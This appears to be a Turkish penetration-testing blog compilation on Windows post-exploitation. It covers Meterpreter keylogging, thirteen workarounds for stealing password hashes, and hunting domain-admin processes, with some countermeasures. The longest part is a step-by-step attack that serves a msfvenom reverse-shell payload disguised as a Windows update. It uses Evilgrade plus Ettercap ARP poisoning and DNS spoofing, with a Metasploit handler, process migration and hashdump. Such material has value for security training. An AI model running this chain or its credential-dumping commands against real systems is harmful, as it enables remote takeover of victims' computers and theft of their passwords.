Post Exploitation: Meterpreter ile Klavye Hareketlerinin Elde Edilmesi

Post Exploitation: Meterpreter ile Klavye Hareketlerinin Elde Edilmesi

Bir sistem ele geçirildikten sonra kurban kullanıcının yaptığı işlemler incelenmek istenebilir. Son kullanıcının yaptığı işlemleri öğrenmenin bir yolu da klavyede bastığı tuşların dinlenmesidir. Bu yazıda, Meterpreter bağlantısı kurulan bir bilgisayardaki klavye tuşları dinlenecektir.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/capturing-keyboard-activities-on-windows-session-via-meterpreter-keyscan-commands/
ve
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/capturing-keyboard-activities-on-winlogon-screen-via-meterpreter-keyscan-commands/

İpucu: hashdump Hatası: priv_passwd_get_sam_hashes

hashdump Hatası: priv_passwd_get_sam_hashes

Meterpreter kabuğuna SYSTEM hakları ile düşüldükten sonra, yerel kullanıcı parola özetlerini almak için Meterpreter kabuğunda hashdump komutunu çalıştırmak gerekir. Meterpreter hashdump komutu, LSASS prosesine kod enjekte eder, CreateThread() fonksiyonunu çağırır ve enjekte edilen kod da LSASS içerisinden parola özetlerini alıp ekrana bastırır. Ancak artık bir çok AV ve HIPS gibi güvenlik mekanizmaları bahsedilen API çağrılarını önlerler. Bu sebeple Meterpreter hashdump çalışmayabilir. Bu ve benzer sebepelerle aşağıdaki gibi bir hata alınabilir:

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Bu durumlarda aşağıdaki işlemler denenebilir:

1) getsystem çalıştırılır. Örnek:

Kaynak: http://www.offensive-security.com/metasploit-unleashed/Pivoting
"getsystem" komutu ile ilgili ayrıntılı bilgi için bakınız.

2) Modül olarak hashdump kullanılır.

Not: Bu modül kayıt defterindeki SAM/SYSTEM anahtarlarını kullanır. Bu modülün çalışması için yönetici hakkı yetmez, SYSTEM haklarını ele geçirmek gereklidir.

Kaynak:
http://securityweekly.com/2014/10/post-exploitation-metasploit-and-windows-hashes.html

3) priv eklentisi yüklendikten sonra SYSTEM hakkı alınır.

Kaynak: http://www.offensive-security.com/metasploit-unleashed/Privilege_Escalation

4) getprivs komutu çalıştırılır. Daha sonra da Meterpreter hashdump veya diğer teknikler denenebilir.

5) MSF bypassuac modülü ile UAC kapatılır (Çalıştığını hiç görmedim)

6) Kayıt defterinden SAM ve SYSTEM dosyası alınır ve BT makinesine indirilir.

Kaynak:
http://ertugrulbasaranoglu.blogspot.com/2013/07/ipucu-kayt-defterinden-sam-ve-system.html

7) Prosesler listelendikten sonra başka bir prosese atlanır. Atlanan prosesin SYSTEM hakları ile çalışan ama winlogon’dan büyük olmayan bir proses olması tavsiye edilir. Svchost.exe dosyası sıçramak için iyi bir proses sayılır. (Aşağıdaki örnekte DA olan kullanıcının prosesine sıçranmıştır.)
Proseslerin listelenmesi: ps

Prosese sıçranması: migrate ProsesID

8) Modül olarak migrate kullanılır.

Kaynak: http://www.offensive-security.com/metasploit-unleashed/Windows_Post_Manage_Modules#migrate

9) Prosese sıçramak için Incognito da kullanılabilir.
Bu amaçla önce tokenlar listelenir:

Sonra da jeton alınır.

Kaynak: http://www.offensive-security.com/metasploit-unleashed/Fun_With_Incognito

10) SYSTEM hakları varken Windows kabuğuna düşülerek yerel bir yönetici oluşturulur.

Daha sonra da psexec ile o kullanıcı hesabı ile bağlantı kurulur.
• RHOST: ms08_067 zafiyetinin bulunduğu bilgisayarın IP bilgisi
• SMBPass: Yeni oluşturulan kullanıcının parolası (TestP@ss123)
• SMBUser: Yeni oluşturulan kullanıcının adı (TestYerelKullanici)
• LHOST: Kendi bilgisayarımızın IP bilgisi

Kaynak: http://ertugrulbasaranoglu.blogspot.com/2013/10/ipucu-psexec-modulu-ile-yeni.html
Daha sonra da hashdump denenir.

11) SYSTEM hakları varken Windows kabuğuna düşülerek yerel bir yönetici oluşturulur.

Daha sonra da o bilgisayara RDP ile girilip, Cain&Abel ile alınabilir. Veya SAM ve SYSTEM dosyası alınabilir. Online olarak almak için aşağıdaki işlemler uygulanabilir:
http://ertugrulbasaranoglu.blogspot.com/2013/08/ipucu-yerel-hesap-bilgilerinin.html
http://ertugrulbasaranoglu.blogspot.com/2013/07/ipucu-kayt-defterinden-sam-ve-system.html

12) MSF smart_hashdump post modülü kullanılır.

MSF smart_hashdump post modülü şu şekilde çalışır:

• Sahip olunan yetki, işletim sistemi, rolü (DC olup olmadığı) belirlenir.
• SYSTEM hakkına sahip olunmuşsa, kayıt defterinden SAM anahtarının altı okunur.
• DC ise, LSASS içerisine kod enjekte edilir.
• İşletim sistemi Windows Server 2008 ise ve yönetici haklarına sahip olunmuşsa, şu 3 adım gerçekleştirilir: Meterpreter getsystem komutu ile SYSTEM hakkı elde edilir. Eğer hata alındı ise, SYSTEM hakkıyla çalışan bir prosese sıçranır. Sonrasında da LSASS prosesine kod enjekte edilir.
• İşletim sistemi Wİndows 7 ve üzeri bir işletim sistemi, UAC devre dışı ve yönetici haklarına sahip olunmuşsa, Meterpreter getsystem komutu ile SYSTEM hakkı elde edilir ve kayıt defterindeki SAM anahtarı okunur. 
• İşletim sistemi Wİndows 2000/2003 veya XP ise, Meterpreter getsystem komutu ile SYSTEM hakkı elde edilir ve kayıt defterindeki SAM anahtarı okunur.

Kaynak:

http://securityweekly.com/2014/10/post-exploitation-metasploit-and-windows-hashes.html

13) Volume Shadow Copy ile SAM/SYSTEM/NTDS.dit dosyası alındıktan sonra bu dosyalar analiz edilir. NTDS.dit ve SYSTEM ile DC üzerinden domain kullanıcılarına parola özetlerinin elde edilmesi için bakınız.

İpucu: Yüksek Yetkili Kullanıcı Haklarının İncelenmesi

Yüksek Yetkili Kullanıcı Haklarının İncelenmesi

Amaç

• Sızılan sistemdeki prosesler incelenecektir.
• Domainde bulunan yüksek yetkili kullanıcıların, bu makinede herhangi bir proses çalıştırıp çalıştırmadığı belirlenecektir.

Yöntem
Önceki yazıda belirtildiği gibi elimizdeki kimlik bilgileri ile farklı bilgisayarlarda oturum açılabilmektedir. Böylece. sızılan makinede çalışan prosesler incelenir:

ps

Hedef makinede proseslerin izlenmesi

Daha önceden elde ettiğimiz bilgilere göre “sisyon” kullanıcısı Domain Admins grubunun üyesi olduğu görülmüştü. Bu sebeple bu prosese sıçranabilir. Eğer, bu makinede, domainde yüksek yetkili olan bir kullanıcı prosesi ve/veya bileti bulunamasaydı, başka makinelerde benzer adımlar gerçekleşecektir.

Not: SYSTEM kullanıcının sisteme girmesi de bir proses (svchost.exe) oluşturmuştur.

Önlem

• Makinelerde yüksek yetkili kullanıcı hakları ile çalıştırılan gereksiz prosesler sonlandırılmalıdır.
• Makinelere giren kullanıcılar, işlemleri bittikten sonra oturumlarını kapatmaya (log-off) zorlanmalıdır.
• Domain yöneticileri gibi, önemli gruplardaki kullanıcıların iki tane hesabı olmalıdır. Bu hesaplardan birisi domain üzerinde işlem yapma haklarına sahip oldukları yetkili hesaptır. İkinci hesap ise, domaindeki normal kullanıcılar gibi, yetkisiz hesaptır. Domain yöneticileri yetkili hesaplarını sadece domain işlemlerini yaparken kullanmalıdır, bu hesapla domain controller haricinde gerekmedikçe herhangi bir yere giriş yapılmamalıdır. Farklı sistemlere giriş için yetkisiz hesap kullanılmalıdır.
• Önemli gruplarda olan yetkili kullanıcılar bu hesaplarını sadece domaine kullanıcı ekleme, domainden kullanıcı çıkarma, grup politikasını güncelleme gibi işlemler için kullanmalıdır. Domain controller gibi, belli ve sınırlı sayıdaki makinelere bu kullanıcı ile giriş yapılmalıdır.

İpucu: Windows Update Özelliğinin Kötüye Kullanılması

İpucu: Windows Update Özelliğinin Kötüye Kullanılması

Uygun şekilde yapılandırılmamaış ağlarda saldırgan, kurban olarak seçtiği bir bilgisayar ile bu bilgisayarın gitmek istediği hedef adresin arasına girebilir. Örneğin Windows işletim sistemini güncellemesini gerçekleştirmek isteyen kurban, Microsoft’un güncelleme sitesine gitmek yerine, saldırganın belirlediği DNS kaydına göre ilgili bir sunucuya yönlendirilebilir. Böylece Windows işletim güncellemesi yerine saldırganın gönderdiği zararlı yazılım yüklenerek kurban bilgisayar, saldırganın eline geçmiş olur.

Bu işlemler 7 adımda incelenecektir:

• Saldırgan ve kurban bilgisayarları birbirlerine olan erişimleri kontrol edilecek
• Evilgrade uygulaması kurulacak ve “winupdate” modülü seçilecek
• “winupdate” modülü ve ilgili diğer kaynaklar ayarlanacak
• Ettercap ile KurbanaDNS spoofing saldırısı gerçekleştirilecek
• Saldırgan, kurban bilgisayardan gelen bağlantı taleplerini dinleyecek olan bir ortamı hazırlayacak
• Kurban işletim sistemini güncellemek için talepte bulunacak ve saldırganın hazırlamış olduğu zararlı uygulamayı indirecek
• Kurbanın zararlı yazılımı çalıştırmasıyla saldırgan kurbanın bilgisayarına bağlanacak ve hak yükseltecek

Erişimlerin Kontrolü
Kurban makine (192.168.100.78), saldırgan makineye erişebilmektedir:

Saldırgan makine (192.168.100.75), kurban makineye erişebilmektedir:

Evilgrade Uygulamasının Kurulumu ve Seçilen Modülün Seçilmesi
Öncelikle www.github.com/infobyte/evilgrade adresinden uygulama sıkıştırılmış bir dosya olarak indirilir:

Bu dosya saldırgana ait Backtrack bilgisayarına kopyalanır ve sıkıştırılmış dosya açılır. Evilgrade betiği çalıştırılır:

Modüllerin yüklenmesi beklenir:

Not: Diğer EvilGrade kurulum metodları için bakınız: http://blog.techdynamics.org/2011/07/howto-install-evilgrade-on-backtrack5.html

Not: Modüllerin listelenmesi için aşağıdaki komut çalıştırılır.

show modules

“winupdate” modülü kullanılmaya başlanır. Kullanılan komutlar aşağıdaki gibidir:

configure winupdate
show options

Not: Betik büyük/küçük harf duyarlıdır.
Üstteki ekran görüntüsünde de görüldüğü gibi “microsoft.com” üst alan adındaki bir takım sitelere erişim sağlanmaya çalışıldığında “agent.exe” adlı uygulama gönderilecektir.

“winupdate” Modülünün ve İlgili Kaynakların Ayarlanması
winupdate modülünde iki önemli nokta vardır: VirtualHost ve Agent. Bu başlıkta, 2 değere göre kaynak ayarlaması gerçekleştirilecektir.

VirtualHost: Kurban bilgisayara gerçekleştirilecek DNS Spoofing saldırısı için Ettercap adı verilen bir uygulama kullanılacaktır. Ettercap uygulaması, DNS spoofing için “/usr/local/share/ettercap/etter.dns” adlı dosyadaki DNS kayıtlarını kullanmaktadır. Bu dosya açılarak içerisine Microsoft sistemlerinin güncellenmesi için kulanılan DNS kayıtları için saldırgan tarafından belirlenen IP adresleri yazılır. Bu adres saldırganın sahip olduğu başka bir saldırı makinesi olabileceği gibi, saldırgann kullandığı Backtrack makinesi de olabilir. Örnek olarak saldırganın makinesi verilmiştir:

Agent: Kurbana gönderilecek olan ajan uygulamanın oluşturulması için msfcli, msfpayload, msfvenom, veya diğer teknikler kullanılabilir. Örnek olarak msfvenom kullanılacaktır. Bu amaçla ayrı bir konsolda msfvenom dizini tespit edilir:

which msfvenom
ls -la /usr/local/bin/msfvenom

EvilGrade uygulamasının başlatıldığı konsola geri dönülerek ajan uygulama oluşturulur. Bunun için, msfvenom kullanılarak kurbanın bağlanması istenen IP adresi (192.168.100.75) ve porta (TCP/4444) bağlantıyı sağlayacak olan “WindowsGuncellemeSaldirisi.exe” adlı bir exe oluşturulup tmp dizinine kaydedilir. Daha sonra da bu exe, ajan olarak ayarlanır.

set agent '["/opt/metasploit-4.4.0/app/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.100.75 LPORT=4444 -f exe  1> <%OUT%>/tmp/WindowsGuncellemeSaldirisi.exe<%OUT%>"]'

Ettercap ile DNS Spoofing İşleminin Başlatılması
Öncelikle boş bir konsol kullanılarak Ettercap arayüzü açılır. Daha sonra da spoofing işlemini gerçekleştirecek olan saldırganın ilgili ağ adaptörü seçilir (Shift + U).

ettercap -G
Sniff > Unified Sniffing 

Not: Seçilen adaptörün dinleme modunda olduğu görülmektedir.

Gelinen pencerede eklentiler listelenir (CTRL + P) ve “dns_spoof” adlı eklenti iki kerek tıklanarak aktifleştirilir:

Plugins > Manage the plugins
dns_spoof

Erişim sağlanabilen sistemler taranır (CTRL + S).

Hosts > Scan for hosts

Not: Tarama sonucunda tespit edilen sistemler listelenebilir (H):

Hosts > Hosts list

Tespit edilen sistemlere Arp zehirlemesi yapılır.

Mitm > Arp poisoning
Optional parameters: Sniff remote connections.

Not: Arp zehirleme işlemin gerçekleştirileceği gruplar otomatik olarak oluşur.

Dinleme işlemi başlatılır (CTRL +W).

Start > Start Sniffing

Not: İstemcinin herhangi bir işleminde saldırgan araya girmiş bulunmaktadır.

Saldırganın Kurban Bilgisayarı Dinlemesi
Saldırgan, saldırıya geçmeden önce kurbanın bağlantıyı kurdupubnda bu bağlantıyı dinleyeceği bir ortam gereklidir. Bu ortamı netcat sağlayabileceği gibi, meterpreter kabuğu ile iletişim kurabilen handler modülü de sağlayabilir. Kurbanın kuracağı bağlantıyı dinlemek için handler modülü başlatılır ve bağlantının kurulacağı IP (192.168.100.75) ve Port (4444) bilgisi girilir.

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.75
set LPORT 4444
show options

Gerekli ayarlamalar uygun şekilde gerçekleştirildikten sonra, kurbanın bağlantıyı başlatması beklenir:

Kurbanın Windows Güncelleştirmesini Başlatması ve Zararlı Yazılımı Alması
Kurban bilgisayarda Windows işletim sistemi güncelleştirilmesi için “windows.update.microsoft.com” adresi kullanılabilir:

Not: İşletim sisteminin otomatik olarak güncellenmesi de beklenebilirdi.
Ettercap’İn DNS kayıtlarını değiştirmesi sayesinde, kurban bilgisayar, Microsoft’un sitesi yerine saldırganın makinesine gider. EvilGrade’in winupdate modülü sayesinde de, kurban bilgisayar, yasal güncelleme paketi yerine, msfvenom ile oluşturulan zararlı yazılımı indirir:

Kurban zararlı yazılımı masaüstüne kaydeder:

Not: Zararlı yazılımının talep edilmesi EvilGrade üzerinde de görülebilmektedir.

Kurbanın Zararlı Yazılımı Çalıştırması ve Saldırganın Kurban Bilgisayarına Bağlanması
Kurban masaüstündeki zararlı yazılımı çalıştırır.

Kurban bilgisayarda bu zararlı yazılım çalıştırıldığında, yazılımın oluşturulduğu PAYLOAD sayesinde, kurban, saldırganın bilgisayarına bağlantı kuracaktır. Böylece bağlantı kurulmasını bekleyen Handler modülüne bağlantı kurulmuştur:

Artık hak yükseltme işlemi gerçekleştirilebilir. Bu amaçla tüm prosesler listelenir:

ps

Sistem hakları ile çalışan uygun bir prosese sıçranır. İstenirse yerel makinedeki hesapların parola özetleri elde edilebilir veya başka işlemler gerçekleştirilebilir:

migrate 1124
getuid
hashdump

Kaynak site:
http://www.mshowto.org/mitm-saldiri-yontemi-ile-windows-server-2008-nasil-hack-edilir.html
http://r00tsec.blogspot.com/2011/07/hacking-with-evilgrade-on-backtrack5.html